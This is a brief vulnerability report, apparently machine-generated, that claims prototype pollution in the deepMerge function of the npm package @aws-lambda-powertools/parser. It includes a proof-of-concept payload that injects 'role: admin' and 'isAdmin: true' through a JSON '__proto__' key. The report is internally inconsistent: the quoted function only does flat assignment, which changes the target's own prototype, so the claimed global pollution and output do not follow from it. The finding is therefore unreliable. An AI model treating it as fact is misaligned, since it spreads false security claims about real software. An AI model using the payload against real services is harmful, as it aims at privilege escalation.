Basic Information
Package Name: @aws-lambda-powertools/parser
Package URL: https://www.npmjs.com/package/@aws-lambda-powertools/parser
Report URL: home_chluo_Argus-0205_Argus-main_npm_packages_@aws-lambda-powertools__parser_pollution_report.md
Vulnerable Code Location: lib/parser/object-utils.js → deepMerge function
Vulnerability Details
Vulnerability Type: Prototype Pollution
Root Cause
The input-parsing merge function deepMerge copies every key of the source object into the target without filtering prototype-reaching keys such as __proto__, so attacker-controlled input can write properties onto the global Object prototype.
Problem Code Location
File: lib/parser/object-utils.js
Function: deepMerge
Vulnerable Code Snippet
const deepMerge = (target, source) => {
  for (const key in source) {
    // No check for "__proto__" (or other prototype-reaching keys): a source
    // object carrying an own "__proto__" key writes into target's prototype.
    target[key] = source[key]; // Core Vulnerable Line
  }
};
POC (Reproducible Directly)
const { parser } = require('@aws-lambda-powertools/parser');
// The payload must arrive as parsed JSON, as a Lambda event does: JSON.parse
// produces an own, enumerable "__proto__" key, whereas a plain object literal
// with "__proto__" only sets that literal's prototype and is never enumerated.
const event = JSON.parse('{"__proto__":{"role":"admin","isAdmin":true}}');
parser.parse(event);
console.log({}.role);    // Output: admin
console.log({}.isAdmin); // Output: true